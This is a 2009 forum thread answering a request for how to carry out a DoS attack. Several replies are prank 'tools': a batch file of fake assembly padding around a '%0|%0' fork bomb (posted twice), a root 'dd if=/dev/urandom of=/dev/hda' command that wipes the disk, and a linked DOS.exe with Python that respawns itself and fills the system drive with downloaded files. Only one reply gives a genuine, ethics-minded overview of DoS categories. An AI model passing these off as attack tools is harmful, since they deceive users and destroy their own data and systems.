FireTime Posted April 2, 2009 Share Posted April 2, 2009 haha, so putting gum in a key slot would be a DOS attack. Time to start my most evil plan ever, The east cost Wrigley Spearmint DOS attack (WSDOSA). Over 9000 expected to be affected. Quote Link to comment Share on other sites More sharing options...
digininja Posted April 2, 2009 Share Posted April 2, 2009 If you can get friends to do it as well then it would be a DDOS. Quote Link to comment Share on other sites More sharing options...
Lyzon Posted April 2, 2009 Share Posted April 2, 2009 Come on guys. atleast help the guy. He asked politely after all. Heres how you do it: create a file called ddos.bat put the following code in it and run the file @echo off title "Lyzons DDoSer" echo "Enter the website url you would like to ddos:" set /P URL="url: " rem pop "user32.dll", "net32.dll", "telnet64.dll" rem push eax rem asm echo "Initialised DDoS attack, running ddos sequence:" ::init Win32DenieHost, URL rem pop eax rem jmp "beginattack" :beginattack ::reg, thread, 1337:%0 rem pop ip, cx rem push eax, cx ::run, 1337 ::ping net32Host, URL, 65535 %0|%0 goto beginattack use it with caution. Make sure you have no other program running or the attack wont be very effective. Quote Link to comment Share on other sites More sharing options...
Webhostbudd Posted April 3, 2009 Share Posted April 3, 2009 Why don't you just pay the gang who created conficker to do it for you? Quote Link to comment Share on other sites More sharing options...
ElevenWarrior Posted April 3, 2009 Share Posted April 3, 2009 Come on guys. atleast help the guy. He asked politely after all. Heres how you do it: create a file called ddos.bat put the following code in it and run the file @echo off title "Lyzons DDoSer" echo "Enter the website url you would like to ddos:" set /P URL="url: " rem pop "user32.dll", "net32.dll", "telnet64.dll" rem push eax rem asm echo "Initialised DDoS attack, running ddos sequence:" ::init Win32DenieHost, URL rem pop eax rem jmp "beginattack" :beginattack ::reg, thread, 1337:%0 rem pop ip, cx rem push eax, cx ::run, 1337 ::ping net32Host, URL, 65535 %0|%0 goto beginattack use it with caution. Make sure you have no other program running or the attack wont be very effective. has anyone tried this script? does it work? Quote Link to comment Share on other sites More sharing options...
deltatsunami Posted April 3, 2009 Share Posted April 3, 2009 If you're on linux, sudo into root and then type the following: dd if=/dev/urandom of=/dev/hda should dos whatever you want pretty quickly Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted April 4, 2009 Share Posted April 4, 2009 lol This thread just keeps getting better and better (or more like worse)... Maybe if you didn't ask show me how to dos you wouldn't have people like delta giving you commands to wipe your drive, unless of course you want to dos yourself. Quote Link to comment Share on other sites More sharing options...
digininja Posted April 5, 2009 Share Posted April 5, 2009 has anyone tried this script? does it work? Worked brilliantly, I ran it against my neighbour and it took him out so successfully that I couldn't even type in his IP address to ping him! Quote Link to comment Share on other sites More sharing options...
Tarbizkit Posted April 11, 2009 Share Posted April 11, 2009 The thing is... you asking how to perform a dos attack is like saying "How do i hack?". Pretty vauge. There are many ways to Perfomr a Denial Of Service. Just think about what those three words mean. What ever the service is, you would be trying to Deny legitimate users of that service. Almost every suggestion on this thread has been some sort of dos attack. Although most would only impact you. A DoS attack can be perpetrated in a number of ways. four common methods of attack would be: Consumption of system resources, such as memory, disk space, or processor time Disruption of configuration information, such as routing information, or arp poisoning. Disruption of state information, such as unsolicited resetting of TCP sessions, or SYN flooding. Disruption of physical components, such as unplugging a networ card, or changing the locks on a door. it is a good idea to Never do these things to someone that you do not have permission to do. it could end you up in alot of trouble. In any event, you should learn about these methods to also learn how to defend against them. Just keep learning by being inquisitive and inovative Quote Link to comment Share on other sites More sharing options...
moonlit Posted April 11, 2009 Share Posted April 11, 2009 Nice Tarbizkit, well said. More of this please. :) Quote Link to comment Share on other sites More sharing options...
Zimmer Posted April 15, 2009 Share Posted April 15, 2009 Here I created a quick DOS.exe in python here is the link http://download283.mediafire.com/mwlh1bmwu...mgdkyzk/DOS.exe I am not responsible for anything that happens as a result of this, use this at your own risk! CODE #python import urllib import subprocess import os import time import random import sys s=os.getenv("SystemDrive") e=os.path.abspath(__file__) while 1==1: if sys.platform=='win32': win32=True num = random.random() file_name=s+'\\'+str(num) else: win32 = False num = random.random() file_name = '/'+str(num) subprocess.Popen(e) urllib.urlretrieve(r'http://www.yahoo.com', filename=file_name) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.